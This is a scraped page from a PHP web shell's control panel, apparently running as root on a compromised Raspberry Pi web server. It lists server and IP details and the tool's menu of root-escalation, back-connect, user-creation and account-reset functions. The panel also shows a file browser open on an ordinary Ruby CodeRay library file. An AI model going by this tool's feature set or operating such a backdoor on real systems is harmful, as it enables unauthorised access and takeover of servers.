Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
coderay /
[ HOME SHELL ]
Name
Size
Permission
Action
encoders
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
scanners
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
duo.rb
2.32
KB
-rw-r--r--
encoders.rb
539
B
-rw-r--r--
for_redcloth.rb
2.51
KB
-rw-r--r--
scanners.rb
663
B
-rw-r--r--
styles.rb
271
B
-rw-r--r--
token_kinds.rb
5.1
KB
-rw-r--r--
tokens.rb
5.07
KB
-rw-r--r--
tokens_proxy.rb
1.5
KB
-rw-r--r--
version.rb
39
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : for_redcloth.rb
module CodeRay # A little hack to enable CodeRay highlighting in RedCloth. # # Usage: # require 'coderay' # require 'coderay/for_redcloth' # RedCloth.new('@[ruby]puts "Hello, World!"@').to_html # # Make sure you have RedCloth 4.0.3 activated, for example by calling # require 'rubygems' # before RedCloth is loaded and before calling CodeRay.for_redcloth. module ForRedCloth def self.install require 'redcloth' unless RedCloth::VERSION.to_s >= '4.2.2' warn 'CodeRay.for_redcloth works best with RedCloth version 4.2.2 or later.' end RedCloth::TextileDoc.send :include, ForRedCloth::TextileDoc RedCloth::Formatters::HTML.module_eval do def unescape(html) # :nodoc: replacements = { '&' => '&', '"' => '"', '>' => '>', '<' => '<', } html.gsub(/&(?:amp|quot|[gl]t);/) { |entity| replacements[entity] } end undef code, bc_open, bc_close, escape_pre def code(opts) # :nodoc: opts[:block] = true if !opts[:lang] && RedCloth::VERSION.to_s >= '4.2.0' # simulating pre-4.2 behavior if opts[:text].sub!(/\A\[(\w+)\]/, '') if CodeRay::Scanners[$1].lang == :text opts[:text] = $& + opts[:text] else opts[:lang] = $1 end end end if opts[:lang] && !filter_coderay require 'coderay' @in_bc ||= nil format = @in_bc ? :div : :span opts[:text] = unescape(opts[:text]) unless @in_bc highlighted_code = CodeRay.encode opts[:text], opts[:lang], format highlighted_code.sub!(/\A<(span|div)/) { |m| m + pba(@in_bc || opts) } highlighted_code else "<code#{pba(opts)}>#{opts[:text]}</code>" end end def bc_open(opts) # :nodoc: opts[:block] = true @in_bc = opts opts[:lang] ? '' : "<pre#{pba(opts)}>" end def bc_close(opts) # :nodoc: opts = @in_bc @in_bc = nil opts[:lang] ? '' : "</pre>\n" end def escape_pre(text) # :nodoc: if @in_bc ||= nil text else html_esc(text, :html_escape_preformatted) end end end end module TextileDoc # :nodoc: attr_accessor :filter_coderay end end end CodeRay::ForRedCloth.install
Close